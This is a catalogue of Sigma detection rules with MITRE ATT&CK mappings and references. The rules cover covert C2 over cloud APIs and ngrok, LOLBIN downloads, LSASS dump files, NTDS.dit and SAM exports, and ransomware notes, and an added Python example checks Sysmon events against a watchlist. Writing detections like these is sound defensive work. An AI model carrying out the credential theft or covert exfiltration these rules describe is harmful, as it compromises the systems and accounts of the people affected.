Detects a non-browser process communicating with the Notion API. This could indicate potential use of a covert C2 channel such as "OffensiveNotion C2"

The tag is: misp-galaxy:sigma-rules="Potentially Suspicious Network Connection To Notion API"

Potentially Suspicious Network Connection To Notion API has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Web Service - T1102" with estimative-language:likelihood-probability="almost-certain"

Table 9859. Table References

Links

https://github.com/mttaggart/OffensiveNotion

https://medium.com/@huskyhacks.mk/we-put-a-c2-in-your-notetaking-app-offensivenotion-3e933bace332

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_notion_api_susp_communication.yml

Network Connection Initiated Via Notepad.EXE

Detects a network connection that is initiated by the "notepad.exe" process. This might be a sign of process injection from a beacon process or something similar. Notepad rarely initiates network communication, except for example when printing documents.

The tag is: misp-galaxy:sigma-rules="Network Connection Initiated Via Notepad.EXE"

Network Connection Initiated Via Notepad.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Process Injection - T1055" with estimative-language:likelihood-probability="almost-certain"

Table 9860. Table References

Links

https://www.cobaltstrike.com/blog/why-is-notepad-exe-connecting-to-the-internet

https://web.archive.org/web/20200219102749/https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1492186586.pdf

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_notepad.yml

Suspicious Non-Browser Network Communication With Google API

Detects a non-browser process interacting with the Google API which could indicate the use of a covert C2 such as Google Sheet C2 (GC2-sheet)

The tag is: misp-galaxy:sigma-rules="Suspicious Non-Browser Network Communication With Google API"

Suspicious Non-Browser Network Communication With Google API has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Web Service - T1102" with estimative-language:likelihood-probability="almost-certain"

Table 9861. Table References

Links

https://www.tanium.com/blog/apt41-deploys-google-gc2-for-attacks-cyber-threat-intelligence-roundup/

https://youtu.be/n2dFlSaBBKo

https://www.bleepingcomputer.com/news/security/hackers-abuse-google-command-and-control-red-team-tool-in-attacks/

https://github.com/looCiprian/GC2-sheet

https://services.google.com/fh/files/blogs/gcat_threathorizons_full_apr2023.pdf

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_susp_google_api_non_browser_access.yml

Network Connection Initiated By IMEWDBLD.EXE

Detects a network connection initiated by IMEWDBLD.EXE. This might indicate potential abuse of the utility as a LOLBIN in order to download arbitrary files or additional payloads.

The tag is: misp-galaxy:sigma-rules="Network Connection Initiated By IMEWDBLD.EXE"

Network Connection Initiated By IMEWDBLD.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"

Table 9862. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1105/T1105.md#atomic-test-10---windows---powershell-download

https://lolbas-project.github.io/lolbas/Binaries/IMEWDBLD/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_imewdbld.yml

Network Connection Initiated To Mega.nz

Detects a network connection initiated by a binary to "api.mega.co.nz". Attackers were seen abusing file sharing websites similar to "mega.nz" in order to upload/download additional payloads.

The tag is: misp-galaxy:sigma-rules="Network Connection Initiated To Mega.nz"

Network Connection Initiated To Mega.nz has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Exfiltration to Code Repository - T1567.001" with estimative-language:likelihood-probability="almost-certain"

Table 9863. Table References

Links

https://www.mandiant.com/resources/russian-targeting-gov-business

https://megatools.megous.com/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_domain_mega_nz.yml

Dllhost.EXE Initiated Network Connection To Non-Local IP Address

Detects dllhost initiating a network connection to a non-local IP address, excluding Microsoft's own IP ranges. Network communication from dllhost depends entirely on the hosted DLL, so an initial baseline is recommended before deployment.

The tag is: misp-galaxy:sigma-rules="Dllhost.EXE Initiated Network Connection To Non-Local IP Address"

Dllhost.EXE Initiated Network Connection To Non-Local IP Address has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Binary Proxy Execution - T1218" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Component Object Model - T1559.001" with estimative-language:likelihood-probability="almost-certain"

Table 9864. Table References

Links

https://redcanary.com/blog/child-processes/

https://nasbench.medium.com/what-is-the-dllhost-exe-process-actually-running-ef9fe4c19c08

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_dllhost_non_local_ip.yml

Cmstp Making Network Connection

Detects a suspicious network connection initiated by cmstp.exe

The tag is: misp-galaxy:sigma-rules="Cmstp Making Network Connection"

Cmstp Making Network Connection has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="CMSTP - T1218.003" with estimative-language:likelihood-probability="almost-certain"

Table 9865. Table References

Links

https://web.archive.org/web/20190720093911/http://www.endurant.io/cmstp/detecting-cmstp-enabled-code-execution-and-uac-bypass-with-sysmon/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_susp_cmstp.yml

Equation Editor Network Connection

Detects network connections from Equation Editor

The tag is: misp-galaxy:sigma-rules="Equation Editor Network Connection"

Equation Editor Network Connection has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Exploitation for Client Execution - T1203" with estimative-language:likelihood-probability="almost-certain"

Table 9866. Table References

Links

https://twitter.com/forensicitguy/status/1513538712986079238

https://news.sophos.com/en-us/2019/07/18/a-new-equation-editor-exploit-goes-commercial-as-maldoc-attacks-using-it-spike/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_eqnedt.yml

Potentially Suspicious Malware Callback Communication

Detects programs that connect to known malware callback ports based on statistical analysis from two different sandbox system databases

The tag is: misp-galaxy:sigma-rules="Potentially Suspicious Malware Callback Communication"

Potentially Suspicious Malware Callback Communication has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Non-Standard Port - T1571" with estimative-language:likelihood-probability="almost-certain"

Table 9867. Table References

Links

https://docs.google.com/spreadsheets/d/17pSTDNpa0sf6pHeRhusvWG6rThciE8CsXTSlDUAZDyo

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_susp_malware_callback_port.yml

Suspicious Network Connection to IP Lookup Service APIs

Detects external IP address lookups by non-browser processes via services such as "api.ipify.org". This could be indicative of post-compromise internet connectivity test activity.

The tag is: misp-galaxy:sigma-rules="Suspicious Network Connection to IP Lookup Service APIs"

Suspicious Network Connection to IP Lookup Service APIs has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1016" with estimative-language:likelihood-probability="almost-certain"

Table 9868. Table References

Links

https://github.com/rsp/scripts/blob/c8bb272d68164a9836e4f273d8f924927f39b8c6/externalip-benchmark.md

https://thedfirreport.com/2022/11/28/emotet-strikes-again-lnk-file-leads-to-domain-wide-ransomware/

https://www.trendmicro.com/en_us/research/23/e/managed-xdr-investigation-of-ducktail-in-trend-micro-vision-one.html

https://www.cisa.gov/news-events/cybersecurity-advisories/aa20-302a

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_susp_external_ip_lookup.yml

Communication To Ngrok Tunneling Service Initiated

Detects an executable initiating a network connection to "ngrok" tunneling domains. Attackers were seen using ngrok to host their second stage payloads and malware. While communication with such domains can be legitimate, it is often a sign of data exfiltration by malicious actors or of an additional download.

The tag is: misp-galaxy:sigma-rules="Communication To Ngrok Tunneling Service Initiated"

Communication To Ngrok Tunneling Service Initiated has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Exfiltration Over Web Service - T1567" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Domain Generation Algorithms - T1568.002" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Protocol Tunneling - T1572" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Proxy - T1090" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Web Service - T1102" with estimative-language:likelihood-probability="almost-certain"

Table 9869. Table References

Links

https://twitter.com/hakluke/status/1587733971814977537/photo/1

https://ngrok.com/docs/secure-tunnels/tunnels/ssh-reverse-tunnel-agent

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_domain_ngrok_tunnel.yml

Suspicious Dropbox API Usage

Detects an executable that isn’t dropbox but communicates with the Dropbox API

The tag is: misp-galaxy:sigma-rules="Suspicious Dropbox API Usage"

Suspicious Dropbox API Usage has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"

Table 9870. Table References

Links

https://www.zscaler.com/blogs/security-research/new-espionage-attack-molerats-apt-targeting-users-middle-east

https://app.any.run/tasks/7e906adc-9d11-447f-8641-5f40375ecebb

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_susp_dropbox_api.yml

Process Initiated Network Connection To Ngrok Domain

Detects an executable initiating a network connection to "ngrok" domains. Attackers were seen using ngrok to host their second stage payloads and malware. While communication with such domains can be legitimate, it is often a sign of data exfiltration by malicious actors or of an additional download.

The tag is: misp-galaxy:sigma-rules="Process Initiated Network Connection To Ngrok Domain"

Process Initiated Network Connection To Ngrok Domain has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Exfiltration to Code Repository - T1567.001" with estimative-language:likelihood-probability="almost-certain"

Table 9871. Table References

Links

https://www.rnbo.gov.ua/files/2023_YEAR/CYBERCENTER/november/APT29%20attacks%20Embassies%20using%20CVE-2023-38831%20-%20report%20en.pdf

https://www.virustotal.com/gui/file/cca0c1182ac114b44dc52dd2058fcd38611c20bb6b5ad84710681d38212f835a/

https://ngrok.com/blog-post/new-ngrok-domains

https://ngrok.com/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_domain_ngrok.yml

Potential Dead Drop Resolvers

Detects an executable, which is not an internet browser or other known application, initiating network connections to legitimate popular websites that were seen being used as dead drop resolvers in previous attacks. In this context attackers leverage well-known websites such as "facebook", "youtube", etc. in order to pass through undetected.

The tag is: misp-galaxy:sigma-rules="Potential Dead Drop Resolvers"

Potential Dead Drop Resolvers has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Web Service - T1102" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Dead Drop Resolver - T1102.001" with estimative-language:likelihood-probability="almost-certain"

Table 9872. Table References

Links

https://securelist.com/the-tetrade-brazilian-banking-malware/97779/

https://twitter.com/kleiton0x7e/status/1600567316810551296

https://github.com/kleiton0x00/RedditC2

https://content.fireeye.com/apt-41/rpt-apt41

https://www.linkedin.com/posts/kleiton-kurti_github-kleiton0x00redditc2-abusing-reddit-activity-7009939662462984192-5DbI/?originalSubdomain=al

https://blog.bushidotoken.net/2021/04/dead-drop-resolvers-espionage-inspired.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_susp_dead_drop_resolvers.yml
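Several of the rules above (Notion API, Google API, IP lookup services, ngrok, Dropbox API, Mega.nz and the dead drop resolvers) share one detection pattern: a network-connection event whose destination is a watchlisted web service, raised only when the originating image is neither a browser nor the service's own client. The following Python is an added example, not part of the MISP galaxy or of the Sigma rules it describes; it runs that logic over constructed Sysmon Event ID 3 records. The watchlist domains, the browser allowlist and the per-service expected clients are illustrative assumptions, not the rules' exact lists.

```python
# Added example (not from the MISP galaxy or SigmaHQ): the "non-browser process
# talks to a watchlisted web service" pattern shared by several network_connection rules.

# Constructed Sysmon Event ID 3 (NetworkConnect) records; not real telemetry.
SAMPLE_EVENTS = [
    {"Image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "DestinationHostname": "api.notion.com", "DestinationPort": 443, "Initiated": True},
    {"Image": r"C:\Users\alice\AppData\Local\Temp\update.exe",
     "DestinationHostname": "api.notion.com", "DestinationPort": 443, "Initiated": True},
    {"Image": r"C:\Windows\System32\notepad.exe",
     "DestinationHostname": "sheets.googleapis.com", "DestinationPort": 443, "Initiated": True},
    {"Image": r"C:\Users\bob\Downloads\report.exe",
     "DestinationHostname": "api.ipify.org", "DestinationPort": 80, "Initiated": True},
    {"Image": r"C:\Program Files\Dropbox\Client\Dropbox.exe",
     "DestinationHostname": "api.dropboxapi.com", "DestinationPort": 443, "Initiated": True},
    {"Image": r"C:\Windows\System32\svchost.exe",
     "DestinationHostname": "1a2b3c4d.ngrok.io", "DestinationPort": 443, "Initiated": True},
    {"Image": r"C:\Windows\System32\svchost.exe",
     "DestinationHostname": "update.microsoft.com", "DestinationPort": 443, "Initiated": True},
    # Inbound connection (Initiated=False): the rules look at outbound traffic only.
    {"Image": r"C:\Windows\System32\svchost.exe",
     "DestinationHostname": "api.notion.com", "DestinationPort": 443, "Initiated": False},
]

# Assumed watchlist: domain suffix -> (label, image basenames legitimately expected
# to contact it). Illustrative; the real rules carry their own domain lists.
WATCHLIST = {
    "api.notion.com": ("Notion API", ()),
    "googleapis.com": ("Google API", ()),
    "api.dropboxapi.com": ("Dropbox API", ("dropbox.exe",)),
    "api.mega.co.nz": ("Mega.nz API", ("megasync.exe",)),
    "api.ipify.org": ("external IP lookup", ()),
    "ipinfo.io": ("external IP lookup", ()),
    "ngrok.io": ("ngrok tunnel", ()),
    "ngrok-free.app": ("ngrok tunnel", ()),
}

# Assumed browser allowlist (basenames, lower-case).
BROWSERS = {"chrome.exe", "msedge.exe", "firefox.exe", "iexplore.exe", "brave.exe", "opera.exe"}


def _basename(image: str) -> str:
    """Lower-case file name of a Windows image path."""
    return image.rsplit("\\", 1)[-1].lower()


def _matches(hostname: str, suffix: str) -> bool:
    """True if hostname is the suffix itself or a subdomain of it (no substring matching)."""
    host = hostname.lower()
    return host == suffix or host.endswith("." + suffix)


def find_non_browser_web_service_connections(events):
    """Return one hit per outbound connection to a watchlisted service from an unexpected image."""
    hits = []
    for ev in events:
        if not ev.get("Initiated", True):
            continue  # only connections the process opened itself
        host = ev.get("DestinationHostname", "")
        proc = _basename(ev["Image"])
        for suffix, (label, expected_clients) in WATCHLIST.items():
            if not _matches(host, suffix):
                continue
            if proc in BROWSERS or proc in expected_clients:
                break  # browser or the service's own client: benign by this rule's logic
            hits.append({"image": ev["Image"], "hostname": host,
                         "port": ev.get("DestinationPort"), "label": label})
            break
    return hits


if __name__ == "__main__":
    for hit in find_non_browser_web_service_connections(SAMPLE_EVENTS):
        print(f"{hit['label']:<20} {hit['hostname']:<25} {hit['image']}")
```

Sysmon fills DestinationHostname from a reverse lookup, so it can be empty or differ from the name the process actually resolved; production rules therefore usually match destination IP ranges too, and the ngrok suffixes should be refreshed from the vendor's domain announcements cited below rather than hard-coded as here.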

Microsoft Binary Suspicious Communication Endpoint

Detects executables located in potentially suspicious directories initiating network connections towards file sharing domains.

The tag is: misp-galaxy:sigma-rules="Microsoft Binary Suspicious Communication Endpoint"

Microsoft Binary Suspicious Communication Endpoint has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"

Table 9873. Table References

Links

https://github.com/EmpireProject/Empire/blob/e37fb2eef8ff8f5a0a689f1589f424906fe13055/data/module_source/exfil/Invoke-ExfilDataToGitHub.ps1

https://www.cisa.gov/uscert/ncas/alerts/aa22-321a

https://twitter.com/M_haggis/status/900741347035889665

https://twitter.com/M_haggis/status/1032799638213066752

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_susp_file_sharing_domains_susp_folders.yml

Potential Privilege Escalation Attempt Via .Exe.Local Technique

Detects potential privilege escalation attempt via the creation of the "*.Exe.Local" folder inside the "System32" directory in order to sideload "comctl32.dll"

The tag is: misp-galaxy:sigma-rules="Potential Privilege Escalation Attempt Via .Exe.Local Technique"

Table 9874. Table References

Links

https://github.com/sailay1996/awesome_windows_logical_bugs/blob/60cbb23a801f4c3195deac1cc46df27c225c3d07/dir_create2system.txt

https://github.com/binderlabs/DirCreate2System

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_system32_local_folder_privilege_escalation.yml

Self Extraction Directive File Created In Potentially Suspicious Location

Detects the creation of Self Extraction Directive files (.sed) in a potentially suspicious location. These files are used by the "iexpress.exe" utility in order to create self extracting packages. Attackers were seen abusing this utility and creating PE files with embedded ".sed" entries.

The tag is: misp-galaxy:sigma-rules="Self Extraction Directive File Created In Potentially Suspicious Location"

Self Extraction Directive File Created In Potentially Suspicious Location has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Binary Proxy Execution - T1218" with estimative-language:likelihood-probability="almost-certain"

Table 9875. Table References

Links

https://strontic.github.io/xcyclopedia/library/iexpress.exe-D594B2A33EFAFD0EABF09E3FDC05FCEA.html

https://en.wikipedia.org/wiki/IExpress

https://www.virustotal.com/gui/file/602f4ae507fa8de57ada079adff25a6c2a899bd25cd092d0af7e62cdb619c93c/behavior

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_sed_file_creation.yml

LSASS Process Memory Dump Files

Detects creation of files with names used by different memory dumping tools to create a memory dump of the LSASS process memory, which contains user credentials.

The tag is: misp-galaxy:sigma-rules="LSASS Process Memory Dump Files"

LSASS Process Memory Dump Files has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="LSASS Memory - T1003.001" with estimative-language:likelihood-probability="almost-certain"

Table 9876. Table References

Links

https://medium.com/@markmotig/some-ways-to-dump-lsass-exe-c4a75fdc49bf

https://www.google.com/search?q=procdump+lsass

https://github.com/elastic/detection-rules/blob/c76a39796972ecde44cb1da6df47f1b6562c9770/rules/windows/credential_access_lsass_memdump_file_created.toml

https://github.com/CCob/MirrorDump

https://www.whiteoaksecurity.com/blog/attacks-defenses-dumping-lsass-no-mimikatz/

https://github.com/helpsystems/nanodump

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_lsass_default_dump_file_names.yml

VHD Image Download Via Browser

Detects creation of ".vhd"/".vhdx" files by browser processes. Malware can use mountable Virtual Hard Disk ".vhd" files to encapsulate payloads and evade security controls.

The tag is: misp-galaxy:sigma-rules="VHD Image Download Via Browser"

VHD Image Download Via Browser has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Malware - T1587.001" with estimative-language:likelihood-probability="almost-certain"

Table 9877. Table References

Links

https://www.kaspersky.com/blog/lazarus-vhd-ransomware/36559/

https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/

https://redcanary.com/blog/intelligence-insights-october-2021/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_vhd_download_via_browsers.yml

LiveKD Driver Creation By Uncommon Process

Detects the creation of the LiveKD driver by a process image other than "livekd.exe".

The tag is: misp-galaxy:sigma-rules="LiveKD Driver Creation By Uncommon Process"

Table 9878. Table References

Links

Internal Research

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_sysinternals_livekd_driver_susp_creation.yml

NTDS.DIT Creation By Uncommon Process

Detects creation of a file named "ntds.dit" (Active Directory Database) by an uncommon process or a process located in a suspicious directory

The tag is: misp-galaxy:sigma-rules="NTDS.DIT Creation By Uncommon Process"

NTDS.DIT Creation By Uncommon Process has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Security Account Manager - T1003.002" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="NTDS - T1003.003" with estimative-language:likelihood-probability="almost-certain"

Table 9879. Table References

Links

https://adsecurity.org/?p=2398

https://stealthbits.com/blog/extracting-password-hashes-from-the-ntds-dit-file/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_ntds_dit_uncommon_process.yml

Typical HiveNightmare SAM File Export

Detects files written by the different tools that exploit HiveNightmare

The tag is: misp-galaxy:sigma-rules="Typical HiveNightmare SAM File Export"

Typical HiveNightmare SAM File Export has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Credentials In Files - T1552.001" with estimative-language:likelihood-probability="almost-certain"

Table 9880. Table References

Links

https://github.com/WiredPulse/Invoke-HiveNightmare

https://github.com/GossiTheDog/HiveNightmare

https://github.com/FireFart/hivenightmare/

https://twitter.com/cube0x0/status/1418920190759378944

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_hktl_hivenightmare_file_exports.yml

PowerShell Module File Created

Detects the creation of a new PowerShell module ".psm1", ".psd1", ".dll", ".ps1", etc.

The tag is: misp-galaxy:sigma-rules="PowerShell Module File Created"

Table 9881. Table References

Links

Internal Research

https://learn.microsoft.com/en-us/powershell/scripting/developer/module/understanding-a-windows-powershell-module?view=powershell-7.3

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_powershell_module_creation.yml

Suspicious Outlook Macro Created

Detects the creation of a macro file for Outlook.

The tag is: misp-galaxy:sigma-rules="Suspicious Outlook Macro Created"

Suspicious Outlook Macro Created has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Office Application Startup - T1137" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Fallback Channels - T1008" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Event Triggered Execution - T1546" with estimative-language:likelihood-probability="almost-certain"

Table 9882. Table References

Links

https://www.mdsec.co.uk/2020/11/a-fresh-outlook-on-mail-based-persistence/

https://www.linkedin.com/pulse/outlook-backdoor-using-vba-samir-b-/

https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=53

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_office_outlook_susp_macro_creation.yml

Suspicious LNK Double Extension File Created

Detects the creation of files with an "LNK" as a second extension. This is sometimes used by malware as a method to abuse the fact that Windows hides the "LNK" extension by default.

The tag is: misp-galaxy:sigma-rules="Suspicious LNK Double Extension File Created"

Suspicious LNK Double Extension File Created has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Double File Extension - T1036.007" with estimative-language:likelihood-probability="almost-certain"

Table 9883. Table References

Links

https://twitter.com/luc4m/status/1073181154126254080

https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-june-mustang-panda/

https://www.anomali.com/blog/china-based-apt-mustang-panda-targets-minority-groups-public-and-private-sector-organizations

https://www.cybereason.com/blog/research/a-bazar-of-tricks-following-team9s-development-cycles

https://twitter.com/malwrhunterteam/status/1235135745611960321

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_lnk_double_extension.yml

Suspicious Creation TXT File in User Desktop

Detects ransomware creating a text file (typically a ransom note) on the user's Desktop

The tag is: misp-galaxy:sigma-rules="Suspicious Creation TXT File in User Desktop"

Suspicious Creation TXT File in User Desktop has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Data Encrypted for Impact - T1486" with estimative-language:likelihood-probability="almost-certain"

Table 9884. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1486/T1486.md#atomic-test-5---purelocker-ransom-note

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_desktop_txt.yml

Creation of a Diagcab

Detects the creation of a .diagcab file, which could be caused by a legitimate installer or be a sign of exploitation (review the filename and its location)

The tag is: misp-galaxy:sigma-rules="Creation of a Diagcab"

Table 9886. Table References

Links

https://threadreaderapp.com/thread/1533879688141086720.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_diagcab.yml

VsCode Powershell Profile Modification

Detects the creation or modification of a VS Code related PowerShell profile, which could indicate suspicious activity as the profile can be used as a means of persistence

The tag is: misp-galaxy:sigma-rules="VsCode Powershell Profile Modification"

VsCode Powershell Profile Modification has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell Profile - T1546.013" with estimative-language:likelihood-probability="almost-certain"

Table 9887. Table References

Links

https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_profiles?view=powershell-7.2

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_vscode_powershell_profile.yml

Suspicious PROCEXP152.sys File Created In TMP

Detects the creation of the PROCEXP152.sys file in the application-data local temporary folder. This driver is used by Sysinternals Process Explorer but also by KDU (https://github.com/hfiref0x/KDU) or Ghost-In-The-Logs (https://github.com/bats3c/Ghost-In-The-Logs), which uses KDU.

The tag is: misp-galaxy:sigma-rules="Suspicious PROCEXP152.sys File Created In TMP"

Suspicious PROCEXP152.sys File Created In TMP has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"

Table 9888. Table References

Links

https://blog.dylan.codes/evading-sysmon-and-windows-event-logging/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_procexplorer_driver_created_in_tmp_folder.yml

OneNote Attachment File Dropped In Suspicious Location

Detects creation of files with the ".one"/".onepkg" extension in suspicious or uncommon locations. This could be a sign of attackers abusing OneNote attachments

The tag is: misp-galaxy:sigma-rules="OneNote Attachment File Dropped In Suspicious Location"

Table 9889. Table References

Links

https://blog.osarmor.com/319/onenote-attachment-delivers-asyncrat-malware/

https://www.bleepingcomputer.com/news/security/hackers-now-use-microsoft-onenote-attachments-to-spread-malware/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_office_onenote_files_in_susp_locations.yml

NTDS.DIT Creation By Uncommon Parent Process

Detects creation of a file named "ntds.dit" (Active Directory Database) by an uncommon parent process or directory

The tag is: misp-galaxy:sigma-rules="NTDS.DIT Creation By Uncommon Parent Process"

NTDS.DIT Creation By Uncommon Parent Process has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="NTDS - T1003.003" with estimative-language:likelihood-probability="almost-certain"

Table 9891. Table References

Links

https://www.n00py.io/2022/03/manipulating-user-passwords-without-mimikatz/

https://www.ired.team/offensive-security/credential-access-and-credential-dumping/ntds.dit-enumeration

https://github.com/samratashok/nishang/blob/414ee1104526d7057f9adaeee196d91ae447283e/Gather/Copy-VSS.ps1

https://pentestlab.blog/tag/ntds-dit/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_ntds_dit_uncommon_parent_process.yml

ADSI-Cache File Creation By Uncommon Tool

Detects the creation of an "Active Directory Schema Cache File" (.sch) file by an uncommon tool.

The tag is: misp-galaxy:sigma-rules="ADSI-Cache File Creation By Uncommon Tool"

ADSI-Cache File Creation By Uncommon Tool has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Protocol Impersonation - T1001.003" with estimative-language:likelihood-probability="almost-certain"

Table 9892. Table References

Links

https://github.com/fox-it/LDAPFragger

https://medium.com/@ivecodoe/detecting-ldapfragger-a-newly-released-cobalt-strike-beacon-using-ldap-for-c2-communication-c274a7f00961

https://blog.fox-it.com/2020/03/19/ldapfragger-command-and-control-over-ldap-attributes/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_adsi_cache_creation_by_uncommon_tool.yml

PSEXEC Remote Execution File Artefact

Detects creation of the PsExec key file, which is created any time a PsExec command is executed. It gets written to the file system and will be recorded in the USN Journal on the target system

The tag is: misp-galaxy:sigma-rules="PSEXEC Remote Execution File Artefact"

PSEXEC Remote Execution File Artefact has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Domain Account - T1136.002" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Windows Service - T1543.003" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Lateral Tool Transfer - T1570" with estimative-language:likelihood-probability="almost-certain"

Table 9893. Table References

Links

https://twitter.com/davisrichardg/status/1616518800584704028

https://aboutdfir.com/the-key-to-identify-psexec/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_sysinternals_psexec_service_key.yml

Suspicious File Creation In Uncommon AppData Folder

Detects the creation of suspicious files and folders inside the user's AppData folder but not inside any of the common and well known directories (Local, Roaming, LocalLow). This could be used as a method to bypass detections that exclude the AppData folder for fear of false positives

The tag is: misp-galaxy:sigma-rules="Suspicious File Creation In Uncommon AppData Folder"

Table 9894. Table References

Links

Internal Research

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_new_files_in_uncommon_appdata_folder.yml

Suspicious Double Extension Files

Detects dropped files with double extensions, which is often used by malware to abuse the fact that Windows hides known file extensions by default.

The tag is: misp-galaxy:sigma-rules="Suspicious Double Extension Files"

Suspicious Double Extension Files has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Double File Extension - T1036.007" with estimative-language:likelihood-probability="almost-certain"

Table 9895. Table References

Links

https://twitter.com/luc4m/status/1073181154126254080

https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-june-mustang-panda/

https://www.anomali.com/blog/china-based-apt-mustang-panda-targets-minority-groups-public-and-private-sector-organizations

https://www.cybereason.com/blog/research/a-bazar-of-tricks-following-team9s-development-cycles

https://twitter.com/malwrhunterteam/status/1235135745611960321

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_event/file_event_win_susp_double_extension.yml
